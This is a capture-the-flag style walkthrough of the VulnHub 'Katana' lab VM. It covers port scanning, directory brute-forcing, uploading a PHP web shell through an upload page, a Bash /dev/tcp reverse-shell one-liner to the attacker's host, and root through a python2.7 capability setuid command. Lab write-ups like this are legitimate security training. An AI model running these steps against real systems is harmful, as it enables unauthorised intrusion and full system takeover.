vulnhub-wp katana

🖳 host discover

sudo netdiscover -r 192.168.213.0/24
Currently scanning: 192.168.213.0/24   |   Screen View: Unique Hosts                                                                                                
 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.213.1   00:50:56:c0:00:08      1      60  VMware, Inc.                   
 192.168.213.2   00:50:56:ed:a6:8f      1      60  VMware, Inc.                   
 192.168.213.129 00:0c:29:3f:3b:78      1      60  VMware, Inc.                   
 192.168.213.254 00:50:56:e3:da:55      1      60  VMware, Inc.             

target was 192.168.213.129

👁 service scan

nmap scan

nmap -p- -sV -sC -Pn -oN nmap --min-rate 8000 192.168.213.129
···
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.3
22/tcp   open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 89:4f:3a:54:01:f8:dc:b6:6e:e0:78:fc:60:a6:de:35 (RSA)
|   256 dd:ac:cc:4e:43:81:6b:e3:2d:f3:12:a1:3e:4b:a3:22 (ECDSA)
|_  256 cc:e6:25:c0:c6:11:9f:88:f6:c4:26:1e:de:fa:e9:8b (ED25519)
80/tcp   open  http        Apache httpd 2.4.38 ((Debian))
|_http-title: Katana X
|_http-server-header: Apache/2.4.38 (Debian)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
7080/tcp open  ssl/http    LiteSpeed httpd
| ssl-cert: Subject: commonName=katana/organizationName=webadmin/countryName=US
| Not valid before: 2020-05-11T13:57:36
|_Not valid after:  2022-05-11T13:57:36
|_http-title: Katana X
| tls-alpn: 
|   h2
|   spdy/3
|   spdy/2
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-server-header: LiteSpeed
8088/tcp open  http        LiteSpeed httpd
|_http-server-header: LiteSpeed
|_http-title: Katana X
8715/tcp open  http        nginx 1.14.2
|_http-title: 401 Authorization Required
|_http-server-header: nginx/1.14.2
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Restricted Content
MAC Address: 00:0C:29:3F:3B:78 (VMware)
Service Info: Host: KATANA; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h19m59s, deviation: 2h18m33s, median: 0s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-03-31T02:02:39
|_  start_date: N/A
|_nbstat: NetBIOS name: KATANA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: katana
|   NetBIOS computer name: KATANA\x00
|   Domain name: \x00
|   FQDN: katana
|_  System time: 2024-03-30T22:02:39-04:00
···

there was lots of service, let’s try one by one!

🚪🚶 get shell

21
there was not allow anonymous to login, so try other service
22 we dont have cred
80
brute path

gobuster dir -u http://192.168.213.129 -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -o 80.out -t 50
/.htm                 (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/.                    (Status: 200) [Size: 655]
/.htaccess            (Status: 403) [Size: 279]
/.phtml               (Status: 403) [Size: 279]
/ebook                (Status: 301) [Size: 316] [--> http://192.168.213.129/ebook/]
/.htc                 (Status: 403) [Size: 279]
/.html_var_DE         (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]

nice, there was a ebook path!
it was a book store cms, there was two path to get shell

• login admin and add book, and upload a shell
• use exploit
  it all fail. fot first, it seems cant write file into the img path.
  second,it fail too.

  python3 47887.py http://192.168.213.129/ebook
  /home/rightevil/.local/lib/python3.11/site-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.18) or chardet (5.2.0)/charset_normalizer (2.0.12) doesn't match a supported version!
    warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
  > Attempting to upload PHP web shell...
  > Verifying shell upload...
  > Web shell failed to upload! The web server may not have write permissions.

  try another port

smb

smbclient -L //192.168.213.129      
Password for [WORKGROUP\rightevil]:

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	IPC$            IPC       IPC Service (Samba 4.9.5-Debian)
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------
	Workgroup            Master
	---------            -------
	WORKGROUP            KATANA

nothings, and we could use enum4linux to enum user.(user:kanata)
7080
it’s a rabbit hole
nothing

all the page was 403
8088
dir brute

gobuster dir -u http://192.168.213.129:8088/ -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -t 50    
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.213.129:8088/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/cgi-bin              (Status: 301) [Size: 1260] [--> http://192.168.213.129:8088/cgi-bin/]
/css                  (Status: 301) [Size: 1260] [--> http://192.168.213.129:8088/css/]
/img                  (Status: 301) [Size: 1260] [--> http://192.168.213.129:8088/img/]
/docs                 (Status: 301) [Size: 1260] [--> http://192.168.213.129:8088/docs/]
/.                    (Status: 301) [Size: 1260] [--> http://192.168.213.129:8088/./]
/.htaccess            (Status: 403) [Size: 1227]
/protected            (Status: 301) [Size: 1260] [--> http://192.168.213.129:8088/protected/]
/blocked              (Status: 301) [Size: 1260] [--> http://192.168.213.129:8088/blocked/]
Progress: 43007 / 43008 (100.00%)
===============================================================
Finished
===============================================================

yes, the docs was the manual guide page about OpenLiteSpeed Web Server 1.5, but i dont find the exploit about it.
let’s search page

gobuster dir -u http://192.168.213.129:8088/  -x txt,php,html --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt  -t 50

there was a upload.html
after trying, we could upload php file in it, but we it seems dont show in port 8088

but it was a web page too(cause /html), so let’s try other port
8715
it have a get login, and we could login by admin:admin
and our backdoor was in this port!

let’s connect to it by weevely(i generate the backdoor by weevely).

if u want,u could reverse a stable shell

bash -c 'bash -i >& /dev/tcp/192.168.213.128/443 0>&1'

🛡️ PE

in /home/kanata, we find kanata’s passwd, and there was root’s hash in /etc/passwd.
but kanata dont have sudo or other, and we couldn’t crack the root’s hash


finally, we find a cap file by linpeas.sh

so get root shell

/usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash");'

📖 recommend article

PE about file capabilities
PE about file capabilities in hacktricks
katana vulnhub download